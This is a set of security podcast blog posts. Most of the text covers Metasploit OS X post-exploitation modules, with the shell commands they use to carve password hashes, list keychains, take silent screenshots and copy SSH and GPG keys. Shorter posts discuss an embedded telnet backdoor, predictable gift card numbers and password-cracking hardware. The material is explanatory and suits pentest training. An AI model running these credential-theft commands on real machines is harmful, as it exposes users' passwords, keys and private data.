Hello boys and girls!

Carlos was kind enough to share some of his brand new OS X post exploitation kung-fu during episode 232.

I know there are a lot of you that still like to believe that OS X does not really matter. However, it is finally getting a respectable market share of 10.9%. And, while it may be fun to bash on Apple from time to time, you will stop laughing when you need to exploit an OS X system and pull data from the target machine. Thankfully, Carlos has made the process of post exploitation far easier for all of us. For that we all owe him a beer or two. After all, the only thing Paul has done successfully with a Mac over the past few years from a post-exploitation perspective was pour beer in his Mac.

So, on to the good stuff.

in today's write-up we will cover 2 new enumeration modules against OS X machines that where added to Metasploit. These modules are:

- use post/osx/gather/enum_osx

- use post/osx/gather/hashdump

We will cover the shell commands used by the modules themselves. One of the advantages of post exploitation modules versus the typical Meterpreter script is that they can be written to be used against both shell and Meterpreter. This initial OS X modules are written and tested for shell but many of the tasks are already written to work for Meterpreter once some issues with the Java Meterpreter are fixed.

Lets start with the OS X Enumeration module. For reasons of demo you will see that we have 2 shell sessions:

 msf exploit(handler) > sessions

 

 Active sessions

 ===============

 

  Id  Type       Information  Connection

  --  ----       -----------  ----------

  1   shell osx               192.168.1.100:4446 -> 192.168.1.100:54010

  2   shell osx               192.168.1.100:4446 -> 192.168.1.100:54013

Session 1 is running as a regular user on a OS X Snow Leopard target and Session 2 is running as root on the same box. The enumeration script will alter its behavior depending on the privilege level it sees it has on the target box and also will alter the commands depending on the version of OSX it is running against. To select the module we use the use command and after selecting we can have a look at the info of the module and the options it provides:

 msf exploit(handler) > use post/osx/gather/enum_osx 
 msf post(enum_osx) > info
 
       Name: Mac OS X Information Enumeration
     Module: post/osx/gather/enum_osx
    Version: 11816
   Platform: OSX
       Arch: 
       Rank: Normal
 
 Provided by:
  Carlos Perez carlos_perez@darkoperator.com
 
 Description:
  This module does initial gathering of information from OSX Tiger, 
  Leopard and Snow Leopard System
 
 
 msf post(enum_osx) > show options
 
 Module options (post/osx/gather/enum_osx):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

To specify a session to run against we just set the option in the Datastore to the number of the session we want to run against

 msf post(enum_osx) > set SESSION 1
 SESSION => 1

once we have a session selected the only thing we need to do is issue the command run

 msf post(enum_osx) > run

 

 [*] Running module against loki.local

 [*] Saving all data to /Users/cperez/.msf3/logs/post/enum_osx/loki.local_20110224.0303

 [*]     Enumerating Development Tools

 [*]     Enumerating Airport

 [*]     Enumerating Applications

 [*]     Enumerating Ethernet

 [*]     Enumerating Bluetooth

 [*]     Enumerating Logs

 [*]     Enumerating Known Networks

 [*]     Enumerating Firewall

 [*]     Enumerating USB

 [*]     Enumerating OS

 [*]     Enumerating Network

 [*]     Enumerating StartUp

 [*]     Enumerating Printers

 [*]     Enumerating Preference Panes

 [*]     Enumerating Frameworks

 [*]     Enumerating Environment Variables

 [*]     Enumerating UDP Connections

 [*]     Enumerating TCP Connections

 [*]     Enumerating Current Activity

 [*]     Enumerating Process List

 [*]     Enumerating Last Boottime

 [*]     Enumerating Groups

 [*]     Enumerating Users

 [*] .ssh Folder is present

 [*]     Downloading config

 [*]     Downloading id_dsa

 [*]     Downloading id_dsa.pub

 [*]     Downloading known_hosts

 [*] .gnupg Folder is present

 [*]     Downloading gpg.conf

 [*]     Downloading pubring.gpg

 [*]     Downloading pubring.gpg~

 [*]     Downloading random_seed 

 [*]     Downloading secring.gpg

 [*]     Downloading trustdb.gpg

 [*] Capturing screenshot

 [*] Screenshot Captured

 [*] Extracting bash history

 [*]     History file .bash_history found for cperez

 [*]     Downloading .bash_history

 [*]     History file .irb_history found for cperez

 [*]     Downloading .irb_history

 [*]     History file .scapy_history found for cperez

 [*]     Downloading .scapy_history

 [*]     History file .sh_history found for cperez

 [*]     Downloading .sh_history

 [*]     History file .sqlite_history found for cperez

 [*]     Downloading .sqlite_history

 [*] Enumerating and Downloading keychains for cperez

 [*] Post module execution completed

 msf post(enum_osx) > 

As it can be seen the modules gathers a lot of data on the target system starting with configuration, network connection, account information and list of processes, Once it gets all of that info it will check for .ssh and ,gnupg configuration folders and download all configuration files down to the attackers machine. It will do a screen capture followed by the enumeration of any history file found in the users home folder and downloads those. If it is running as root it will extract the SHA1 hashes for the users on the box, if the box is sharing a Samba Share or talks to AD it will also extract the NTLM and LM hashes for the users creating separate files in John the Ripper format for each encryption scheme.

Most of the data collected for configuration is gathered using the system_profiler command, it works by specifying the data type which correspond to a configuration are that we want the information for, to list the supported data types we run the command with -listDataTypes:

 loki:~ cperez$ system_profiler -listDataTypes
 Available Datatypes:
 SPHardwareDataType
 SPNetworkDataType
 SPSoftwareDataType
 SPParallelATADataType
 SPAudioDataType
 SPBluetoothDataType
 SPCardReaderDataType
 SPDiagnosticsDataType
 SPDiscBurningDataType
 SPEthernetDataType
 SPFibreChannelDataType
 SPFireWireDataType
 SPDisplaysDataType
 SPHardwareRAIDDataType
 SPMemoryDataType
 SPPCIDataType
 SPParallelSCSIDataType
 SPPowerDataType
 SPPrintersDataType
 SPSASDataType
 SPSerialATADataType
 SPUSBDataType
 SPAirPortDataType
 SPFirewallDataType
 SPNetworkLocationDataType
 SPModemDataType
 SPNetworkVolumeDataType
 SPWWANDataType
 SPApplicationsDataType
 SPDeveloperToolsDataType
 SPExtensionsDataType
 SPFontsDataType
 SPFrameworksDataType
 SPLogsDataType
 SPManagedClientDataType
 SPPrefPaneDataType
 SPStartupItemDataType
 SPSyncServicesDataType
 SPUniversalAccessDataType

For connection the netstat command is used

# netstat -np tcp


# netstat -np udp

To get Environment variables we used

# printenv

For Boot Time and current activity the who command

# who -b

# who

For processes

# ps -ea

For enumerating users and groups it varies per version of the OS, for Leopard and above:

# dscacheutil -q user

# dscacheutil -q group

For Tiger and bellow:

# lookupd -q user

# lookups -q group

For Screenshot of the following command is used:

As Root:

# launchctl bsexec {loginwindow PID} screencapture -x screenshot.jpg 

As User:

$ screencapture -x screenshot.jpg 

For history files the following regex is used to match the most common history file names

\.\w*\_history

This will match any hidden file with the word history at the end.

For dumping hashes the module must run as root, OS X does not store the credentials in a passed or master.passwd file but more like HPUX Trusted mode in individual files by account. Firs thing is we need to get the GUID of the account to do this we run

Leopard and Above:

# dscl localhost -read /Search/Users/{user} | grep GeneratedUID | cut -c15-

Tiger:

# niutil -readprop . /users/{user} generateduid

Now with the GUID we can carve the file with the hashes, the modules carves out SHA, LM and NTLM hashes:

• SHA1:

#/bin/cat /var/db/shadow/hash/{guid}  | cut -c169-216

• NTLM:

# /bin/cat /var/db/shadow/hash/{guid}  | cut -c1-32

• LM:

# /bin/cat /var/db/shadow/hash/{guid}  | cut -c33-64

The last thing the module does is enumerate all keychain files for the users and download them:

• As User:

$ security list-keychains

• As Root:

# sudo -u {username} -i /usr/bin/security list-keychains

I fully expect there will be more from an OS X exploitation perspective over the next few months and years. It is comforting to know that Carlos is already ahead of the curve when it comes to post exploitation on this fine platform.

Brought to you by: Darkoperator and strandjs

Originally discussed during episode 231

Hot off the heals of yesterday’s post!!!

I'm not trying to use buzzwords or get popular by using the term "0day threat" (in fact I hate the whole way we say "O-Day", it’s just annoying). In any case, there is an "O-Day" floating around for Microsoft systems, in particular the SMB service on Windows 2003 AD servers. Ouch. So you're probably saying, "But I have a firewall, IDS/IPS, Anti-Virus software, and patch management." So do a lot of people, which is why attackers use social engineering and "O-Day" attacks. You have to ask yourself, if someone wanted to target you, how successful could they be? What's stopping them from getting your users to click on a link or open an attachment? What stops your users from accessing SMB on your servers? How do your servers defend against a 0day attack? This is one reason why I love real-world hacking challenges. I've done several over the years, and it always starts out the same way. You have to defend the network for the first hour of the competition without a firewall and without patches. "But that’s not fair," people say, but that’s the real world. It’s like that scene from the movie "Dodgeball" where the coach has them all line up for training. He then takes out a giant wrench, and without warning, hurls it at one of the guys who gets clocked in the face. He then states, "If you can dodge a wrench, you can dodge a ball." So, if you can defend a "naked" network, you can certainly defend one with a firewall and other techniques. It’s not so much about protecting the attack to begin with, but what happens afterwards.

Further, if we look at defending without a firewall, without AV and missing patches it just so happens that your are getting frightfully close to the way the "real-world" is. AV can be easily bypassed. IDS is routinely sidestepped by simply using encryption or by the attackers using protocols you use to manage your network (SSL, SSH, RDP anyone?). So, with that in mind, how well can you defend your network?

Gun wins every time

Finally, sit down and think for a moment... How much would an attacker gain by obtaining access to your critical data? If the attacker can gain, say, a million credit card and they can get $1 on the black market for it, there is a significant up side for them to do this. If an attacker can gain one million by compromising your network, do you think there is a possibility they may go through the effort to develop or purchase 0day?

No friends, it has nothing to do with prevention anymore. It is now a questions of containment and detection.

-PaulDotCom and strandjs

Originally on episode 231.

Okay, so let me first start by saying that this is a step in the right direction. I firmly believe that embedded system manufacturers who are looking for improved security and forming partnerships with security companies is a good thing. However, and this is a BIG however, look at the track record. I wouldn't be doing this justice if I didn't mention the freakin' huge gaping security hole that HD Moore found in just about all VxWorks devices because they left debug functionality turned on! I'm sorry, but there are just some things that cannot be helped by security companies, and that’s poor security practice. Oh, and furthermore, so many embedded systems vendors give you a backdoor in your firmware, which gives administrative control, where I can turn off any extra layers of protection. And don't get me started on Mcafee, "Oh look, /proc is a virus, I will just delete it!" Great, thanks for that. Security is not about add-ons and features, it’s about processes and controls. Wind River came out and said, "But our operating system is secure" yet it wasn't, not even close. Security is culture, not products, and I sincerely hope embedded device manufacturers adopt a more security-focused culture.

Paul also wants a pony Your Princess Leia memories will never be the same

To make matters worse, we constantly run into issues where companies have very poor patching polices for these devices. The reason? It’s an "embedded device," not a "computer." Look, we can point the finger at a number of different vendors, and there is plenty of blame to go around. However, we feel there are limits to that blame. Sure, debug by default is dumb. Sure, having simple buffer overflows in your product is laughable. But, we as security professionals should assume these types of vulnerabilities exist. Once we accept this simple fact, you can architect your environment so that if these eventual vulnerable applications/systems/devices/people are exploited or exploitable you can quickly react and contain the incident.

-PaulDotCom and strandjs

Originally on episode 231.

I LOVE vulnerabilities like this! You win remote code execution over port 443, where you then win a free trip to the configuration of end-user policies, and as a bonus you will get an exclusive excursion to "perform other administrative tasks." Consider that this is software that touches every end-user workstation, and it’s a vacation I can wait to go on. The best part is that most people are giving this vacation away because, well, it’s on the inside of the network so I don't have to patch it. That’s when BEEF comes in handy to hook your browser, read your bookmarks and URL history, find the internal IP/Hostname of your CSA console, then hopefully get your browser to send the payload I need. At least that’s how I see it going down, and I will have a fancy drink with lots of umbrellas and fruit in it, just because that’s how I roll on vacation.

Paul On Vacation. They Hatin'

Further, many of the CSA Consoles we have encountered over the past few years have not been patched well at all. While we love the idea of white-listing, this shows some of the limitations of security monocultures. The idea is great, yet the execution can be flawed.

Further, I feel that many of these products tend to make us lazy. Much in the same way AV, Firewalls and IDS have made us lazy. Even though something like CSA or another application white-and-nerdy listing comes out we always need to assume there is going to be vulnerabilities in the product.

Now... We need to find a way to pull Paul off the ceiling and reduce his coffee vrs. cold medicine intake.

-PaulDotCom and strandjs

Originally on episode 231.

So, Sony Tweets its own protection key. This key will allow, among other things, people to make copies of games and distribute them online. This could hurt Sony's sales, or would it? I'm thinking that the closed nature of video game consoles hurts sales. If you could buy a device and have it allow for even more functionality, won't they sell more systems? Also, does this really hurt video game sales? Of course, once the key is released and on the Internet, its out there. Restraining orders are a futile effort, why doesn't Sony understand this?

But there is another question that needs to be asked... How the hell did this happen? I mean there are a number of "accidents" that can be explained easily.

"I am sorry, I got your daughter pregnant."

"Dad.. I had no idea it was loaded."

But tweeting the protection key? From a fictional VP's twitter account? That makes no sense.

Either way, I doubt it will make that much difference. IT WAS ALREADY OUT!! So is this news?? Maybe just because it is funny.

- PaulDotCom and strandjs

There are some vulnerabilities that I come across which just make my jaw drop. This is one of them. There is a backdoor in the linux-based firmware that allows you telnet to port 1111 and get a command prompt. The command prompt seems to be associated with the console administration program. This console allows you to run shell commands, in addition to several other functions. There is no password required, and it appears that the default password (as shown from dumping /etc/shadow) is wlan. There is no patch for this vulnerability which appears in select firmware versions. "bob" has confirmed that this is real...

This just goes to show that as much as you try to secure something there is a developer who is out to sabotage you. It also gets to the heart of the whole 0 day issue. You have to assume there is a 0 day in your software... Then, plan accordingly

-PaulDotCom and strandjs

While I was attending Brucon 2010 I had the opportunity to do an interview with Aluc.tv. Aluc is a great guy and we discuss, among other things:

• How I earned the nickname "PaulDotCom"
• My plot to take over the world using Embedded Systems
• Running away from Joe
• "I don't want to be naked with Chris Nickerson"
• Why we started the podcast
• The dirty secrets of PaulDotCom Show
• The Security Fail Web Site
• Our favorite cigars

Aluc.tv does a great job putting together video and audio episodes of his podcast which discusses information security and hacking. Check it out!

Yea... Sorry it is just true. I was hanging out with D3ad0ne at a recent SANS conference then he unleashed the monster below on me.

I have to say that I felt a bit dizzy just thinking about the specs for this monster. The biggest shock was that it was cooled not my water, but with Chuck Norris's tears. Sure, the damn things cure cancer, but D3ad0ne uses them to cool his password cracking system.

Below is the insane email he sent me with pics of the beast.

##Begin D3ad0ne's email##

Hey John, You said to send you the specs on my super hash cracking rig. I call it Erebus after the Greek god. So lets get down to the stats:

Motherboard: EVGA SR-2 Classifed
CPU(s): Two Intel Xeon x5650's, 24 total cores
GPU(s): Six EVGA GTX 480 Hydrocopper, 2,880 total cores
Memory: 12GB Corsair Dominator tripple channel
Harddrive1: 1TB drive dual boot Ubuntu/Win7,
Harddrive2: Two SSD Corsair C300 128GB drives in raid 0

Just FYI stuff:
The system is set up to be versatile running dual boot Win7 64 and Ubuntu 64. With 12GB and 24 CPU's I can run a dozen virtual machines for testing in a lab environment. The SSD's have gig's of rainbow tables, and dictionaries for use with cracking hashes. Using Cryptohaze GPU rainbow table program I can find hashes in the rainbow tables within seconds thanks to the GPU/SSD combination. Mostly I use hashcat or oclhashcat. Oclhashcat is able to utilize both dictionaries and bruteforce separately or at the same time including rules, all on the GPU, It is also one of only a few tools that is supported in both windows and linux as well as being able to use both nvidia or ati video cards. For NTLM without overclocking I tend to get around 10.5Billion password attempts a second even with several thousand hashes. The creator Atom is also working on a multigpu version of md5(unix) and currently I am getting 5.5million/sec. This may seem slow but usually with JTR you may only see a couple hundred/sec with this hash type. If I'm cracking something with dictionaries and I want to use a lot of rules, I will use regular hashcat, if I use the -n 24 switch it will utilize all 24 CPU cores 100%.

So far I've spent close to $10K US. But I'm also getting a second shelf with a PCI-E bus extender from a company called Magma. The ExpressBox4 will allow me to install up to 4 more cards, but I only plan on getting 2 more GTX 480's, so 8 in all. Also I should mention that all the GPU's are water cooled, as well as the CPU's. I use a program coded by Atom to allow me to test the GPU's to ensure that the shaders are 100% stable when overclocking. Currently I can run the GPU shaders at 1711Mhz instead of the stock 1400Mhz so a little over 17% over stock. And of course hash cracking speed is based off of the number of cores * clock speed. In total it surpasses 5 TeraFLOPS. Not bad for a personally owned machine. Pictures attached. :)

Video Game Rigs Suck

Do you have an impressive home rig? Shoot us an email and share: pauldotcom@mail.pauldotcom.com

-strandjs

John Strand will be presenting Hacker Techniques and Incident Response at SANS San Francisco this November. Also, there is no way in hell his wife would allow him to have a rig like this... It would scare the children.

A topic I have been following lately is gift cards and the profound lack of randomness in their numbers.

This whole "love affair" started when I was teaching at RSA a year or so ago and they handed out gift cards to all of the attendees of their training for lunch. They were actual pre-paid AMX cards for a local mall, the exact same cards you would give out to friends and family because you are too lazy to buy them a proper gift.

When we got back to class I asked everyone if they would be willing to partake in an experiment. I had all of them write their numbers down and bring their cards up to the front of class and lay them all out. What we found was a bit odd. The numbers were all very close to each other. What happens is a company (or a person) buys a batch of these then hands them out. There were over 200+ people there for the training and it was pretty clear all of these cards were from the same batch.

Far to close

Just a few days ago I was in a blue big-box department store, and while waiting in line I noticed the huge variety of different gift cards for iTunes, Chili’s, Amazon and just plain Visa gift cards for the lazy. I decided on a whim to purchase three cards with numbers on the outside of the package as close to each other as possible.

A three year old chewed on the other one

So there I am sitting on the floor of a department store with about 50 cards spread out around me. Oddly enough no one stopped me or asked me what I was doing. Apparently, a strange person in a "There no place like 127.0.0.1" shirt, sitting on the floor while sifting through gift cards is not all that strange a sight. Because God knows, there is no better way to be "edgy" then wearing shits that will only be understood by .1% of the population.

When it came time for my purchase there were a few surprises. First, I had to put at least $20 on the card. That was cool. Second, I had to purchase them with cash. This was very interesting. I cannot help but wonder if the organization in question here knew the security of this whole system sucked and wanted their money upfront. It also may be a way to stop people from converting stolen credit cards to gift cards easily.

As soon as I got home I opened them and with very little-to-no-shock, the numbers were damn close to each other. One (small) saving grace was the three number, CVC or CCV numbers, were all different. I did some plugging around and I found that these numbers are not mandatory for online merchants. Further, I went searching around online and I found a number of vendors who do not require this number.

Even Closer

Finally, the cards are a bit cheap looking. It would be no great feat for a bad guy to clone and create additional cards with numbers that will be used. He would just have to wait for the Christmas rush and go shopping.

I talked about this in the SANS 560 vLive class I was teaching and Leonard Isham (one of my students) sent me a fascinating pair of articles:

Man Scentenced for Gift Cards Cloning

iTunes and Ebay Money Laundering scan

Turns out there has been a problem with this for some time.

Let’s step back from this for just a second and look at the larger issue. Randomness is key to security. Below are just a few examples where numbers that are non-random have bit us in the ass.

IP IDs

Source Ports for DNS

MiFi Card Passwords

Session Tokens

Initial Vector Values in WEP

The point we should take from all of this is that anytime there is nonrandom numbers it is a possible point of attack. There are examples to the contrary, though. For example, WPA uses sequential IV's to reduce the chance of collision due to the birthday paradox. However, situations where someone thought it through are rare. Most of the time it is simply due to the fact that someone is being lazy. Turns out, chaos is your friend when it comes to securing your protocols and numbering schemes!

The more I think about this, the more it makes me mad. Why do vendors do this? I guess it is because they never thought it was a problem. People keep buying cards and if the money disappears, who cares? The unlucky consumer has little or no recourse. Can you imagine a scenario where someone goes and complains that the money that was supposed to be on their card is gone?

"Right sir! I will put the money back on your card. How much was it you say? $100? Righty-right!"

Unlikely.

Maybe this year I will pass on the gift card rush. Maybe, this year I will give thoughtful gifts that reflect how important each person on my gift list is to me. Maybe this year I will not buy gift cards.

Doubt it.

-strandjs

John Strand will be teaching SANS Hacker Techniques and Incident Response in San Francisco November 5-11.

Last ShmooCon something wicked and evil happened. The fine folks on the PDC mailing list decided it would be a great idea to have a place at Shmoo where we could all meet up and share Rainbow Tables. What a grand idea! After all, good Rainbow Tables can easily go well into the hundreds of gigabits so why not have a nice get together and share?

Small problem. Everyone showed up with empty hard drives. No one, not a single person, brought any tables at all.

Zip.

Almost as crappy

Add to this the fact that my external hard drive with my Rainbow Tables crashed out on me last week. So, we now have two important lessons to take from the Rainbow Tables saga. Lesson one: no one is willing to share. Lesson two: backups are kind of important.

To remedy this situation I went to the fine people at Project Rainbow Crack and ordered a new set of tables for NT and LANMAN hashes. You may say that simply downloading them would be cheaper, and you would be right. However, we were in a bind on a current pen test and needed them immediately. Turns out it would be much faster to order them and have them shipped to us rather than download them.

I went to the section the Project Rainbowtable site to buy the tables and ordered the USD $300 set. What I would get is a new 320 GB hard drive and the 272 GB of tables for LM and NT hashes to go with it. What I was not expecting was that overnight air was included in the cost.

These guys simply rock. The service was excellent, and their packing… well their packing was something to be seen to be belived.

As near as I could tell it was wrapped in bubble wrap, 4 years of newspaper compressed to 1" around the entire drive and the strongest tape known to man wrapped liberally around the drive.

First, I needed the right tools.

Hard Liquor Not Optional

Finally, I was able to squeeze the box out and see what was sent to me. It was an external hard drive. No Liquor to replenish my stock. It would have been better if there was alcohol in the package. For this reason, and this reason only, they get 4 out of 5 stars.

Everything was in its place. The tables, and the software to make them sing. I was a bit disappointed to see that only the programs for Windows were included. A bit of a bummer, but that is ok. There are plenty of places online to find Linux and OSX programs that work with the tables that were sent to me.

Oddly enough, the software was WinRAR protected with a password of "abcde12345". I am pretty sure this has something to do with crypto export controls. But it still made me chuckle.

How did they work? Beautifully. We were able to crack an Admin LANMAN password hash in under 5 min, and a NT only hash in under 15min.

When you get the tables there will be a couple of things that you will notice. First, the tables are in .rtc format. This is no big deal, except other tools like Cain and Able will need the tables to be in .rt format. The fine folks at Project Rainbow Crack have a few excellent tools to covert the formats here.

I cannot recommend the product from the fine folks at Project Rainbow crack enough. The drive is ok and the service was prompt and the tables worked.

Also, I am currently backing up the tables to two different drives.

Next year I will be bringing some tables to share.

There are currently a number of great sites that offer free tables. Below are just a few:

http://www.freerainbowtables.com/

http://ophcrack.sourceforge.net/tables.php

Before you come to Shmoo get some tables and bring them to share with everyone else.

We will not have a repeat from last year.

-strandjs